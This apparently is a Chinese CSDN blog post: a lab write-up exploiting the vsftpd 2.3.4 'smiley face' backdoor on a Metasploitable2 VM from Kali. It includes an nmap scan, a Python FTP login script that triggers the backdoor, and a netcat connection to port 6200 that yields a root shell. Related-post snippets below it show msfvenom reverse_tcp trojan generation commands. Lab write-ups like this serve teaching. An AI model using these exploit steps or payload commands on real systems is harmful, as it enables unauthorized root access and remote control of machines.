Kali渗透测试-远程控制:6200端口变成“后门”

最新推荐文章于 2024-08-27 07:56:46 发布
最新推荐文章于 2024-08-27 07:56:46 发布
阅读量3.1k 收藏 13
点赞数 1
分类专栏: 笔记 渗透测试 文章标签: 安全 linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41905135/article/details/124615711
版权
本文介绍了如何通过Kali Linux进行渗透测试,利用Netcat和Nmap工具针对Metasploitable2靶机的VSFTPD-2.3.4漏洞进行扫描和连接测试。通过注入脚本激活笑脸漏洞,使得6200端口变为后门,实现了远程控制的尝试,尽管最终未能完全控制,但展示了渗透测试的基本流程。
摘要由CSDN通过智能技术生成

Kali渗透测试-远程控制:6200端口变成“后门”

测试环境

攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248)

靶机:Metasploitable2 - Linux (IP:192.168.68.205)

攻击工具:Netcat(nc) “瑞士军刀”

扫描工具:Nmap version 7.92

漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200端口打开一个连接,从而通过这个连接失效对目标主机的控制。关于“笑脸漏洞”大家可以自行搜索一下相关信息。

测试步骤

1. 攻击上运行nmap扫描
┌──(kali㉿kali)-[~]
└─$ nmap --script ftp-vsftpd-backdoor 192.168.68.205

2. Netcat 扫描端口测试连接

以靶机80端口为例测试,命令如下:

┌──(kali㉿kali)-[~]
└─$ nc -v 192.168.68.205 80  
192.168.68.205: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.68.205] 80 (http) open

可以看到这个端口状态为open, 也就是开放的。接下来试一下可否通过80端口控制目标, 命令如下:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 80

测试完成之后,系统会暂时没有反应。再输入一条Linux操作系统用于现实用户名称的whoami命令,以此来查看是否能通过80端口来控制目标,如下图所示:

虽然出现了如上提示,但这只是Metasploittable2的欢迎界面,尝试失败。

3. 激活笑脸漏洞,开启6200端口

分享一段注入脚本代码,如下:

import socket
from ftplib import FTP
host_ip = '192.168.68.205'
ftp = FTP()
backdoorstr = 'hello:)'
backdoorpass = "it's me"
try:
    ftp.connect(host_ip, 21, timeout = 2)
    ftp.login(backdoorstr, backdoorpass)
except:
    print('完成笑脸注入')

先运行注入脚本,如上图所示,注入成功。然后运行如下命令:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200

运行结果如下图:

虽然只显示了一个光标,但是对Netcat表示已经成功连接了。

4. 输入测试命令

输入如下命令,得到回应–root

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200                                                                                              1whoami
root

以root身份登录,然后输入其他测试命令,如“ls”、 “cd”、 “pwd”也都成功,如下图所示:

通过如上测试,可以看到6200端口上运行的vsftd-2.3.4。当用户名中存在“:)”两个连续的符号时,就会激活vsf_sysutil_extra函数,这个函数会在本地建立一个socket,然后绑定到6200端口,之后调用exec函数绑定/bin/sh。

Bruce_Liuxiaowei
关注
专栏目录
kali的学习笔记篇(七)metasploit之PC后门
Kind&红衣的博客
08-12 1172
//生成后门 //参数可参照第五篇文章:PC渗透参数集 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe //选择模块 use exploit/multi/handler //装载攻击载...
Kali Linux之常见后门工具介绍
weixin_34061042的博客
02-26 1896
1、Meterpreter 它是Metasploit框架中功能强大的后渗透模块。可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。 命令        作用 sessions     查看会话ID信息 idletime     显示目标主机截止当前无操作命令的时间 webcam_snap  抓取目标主机的摄像头,将拍摄的内容保存...
网络渗透测试-远程控制:为什么6200端口变成了一个“后门
m0_73804656的博客
12-12 153
事实上,在运行的vsftpd-2.3.4中,当用户名中存在“:)”两个连续的符号时,就会激活vsf_sysutil_exr函数,这个函数会在本地建立一个socket,然后绑定到6200端口,之后调用exec函数绑定/bin/sh。打开另一个终端,使用nmap -p port ip 来查询靶机的6200端口开放情况,这里即输入nmap -p 6200 129.168.146.129 ,发现靶机的6200端口已经打开了。然后用语法 “user 随意内容:)”,下一步,输入“pass 随意内容”,如下图,
如何使用kali来入侵(渗透)一台windows
最新发布
dzqxwzoe的博客
08-27 1287
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali下生成web端后门
weixin_34397291的博客
12-07 817
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...
kali Linux生成Windows后门
webkm的博客
04-24 882
教程开始: Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块 msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: 生成了木马shell.exe,顺便一提lhost(localhost)和lport要设置为你的IP和你打算使用的端口。 ...
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 585
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
kali-linux-web-pentest-cookbook
06-24
Kali Linux Web Penetration Testing Cookbook》是一本深入探讨网络安全领域的专业书籍,专注于使用Kali Linux进行Web应用程序渗透测试的技巧和策略。Kali Linux,原名BackTrack,是一款广泛应用于安全审计和网络...
渗透测试-[Meterpreter后渗透25招]
m0_43405474的博客
05-07 3307
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
Kali Linux远程控制
qq_71207842的博客
06-12 2396
如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢? 1、让目标系统上的服务崩溃。 2、在目标系统上执行某个程序。 3、直接控制目标系统。 是不是第3个选择是最激动人心的呢?
渗透测试-自己手写端口扫描器
04-23
《从零开始写漏扫》系列,端口扫描源码,Python3编写,使用socket实现全连接扫描、Scapy实现SYN半连接扫描、TCP FIN扫描、NULL扫描、XMAS扫描、TCP ACK扫描、TCP窗口扫描。使用锁机制实现线程同步,多线程端口扫描,具体速度取决于使用者当前网速,以及同时可开启的线程数,欢迎交流学习。
kali-linux远程控制
m0_73408920的博客
04-15 1869
本次实验会按照以下主题来介绍kali linux中的远程控制。@ 为什么6200端口变成了一个“后门”@ 远程控制程序基础@ 如何使用MSFPC生成被控端。@ 如何在kali linux 2中启动主控端。@ meterpreter在各种操作系统中的应用。远程控制是指管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段,连通需被控制的计算机,将被控计算机的桌面环境显示到自己的计算机上,通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3691
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
Kali利用metasploit 生成后门程序,操作目标主机cmd
qq_19641369的博客
11-27 4671
一.利用命令生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe LHOST:表示本机地址 -f :表示生成程序的后缀 met:文件名 可以自定义 把生成的exe文件发送给目标主机执行,注意记得伪装下否则会被杀毒软件识别,我这里是利用打包命令将其打包,然后发送到目标主机执行。 二.msfconsole 命令打开控制台 root@...
后门
蓝法典的专栏
02-28 1133
Mix老装一幅正人君子的样子,说写文档,哼哼。。。。无聊,cmd /?后看见好多东西,其中有个好玩的: ******************* 如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 两个都存在,这两个变量会先被执行。 HKEY_LOCAL_MACHINE/Software/Microsoft
Linux学习之Kali制作简单的Windows的木马,创建后门
weixin_42514162的博客
11-01 6061
Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块(超级多,要等一会,哈哈) msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.79.3 lport=2333 -f exe &
kali渗透测试远程控制:通过激活靶机Metasploitable 2中的笑脸漏洞使其开启6200端口进行远程控制
m0_64128402的博客
11-06 828
kali渗透测试远程控制6200端口变成了“后门
Kali linux渗透测试系列————32、Kali linux 维持访问之操作系统后门
Fly_鹏程万里
05-16 2271
操作系统后门简单来说,所谓后门(backdoor),就是绕过目标系统安全控制体系的正规用户认证过程而维持我们队目标系统的控制权,以及隐匿我们控制行为的方法。CymothoaCymothoa是一款可以将ShellCode注入到现有进程(插入进程)的后门工具。借助这种注入手段,它能够把ShellCode伪装成常规程序。他说注入的后门程序应当能够与贝注入的程序(进程)共存,以避免被管理或维护人员怀疑。将...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bruce_Liuxiaowei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值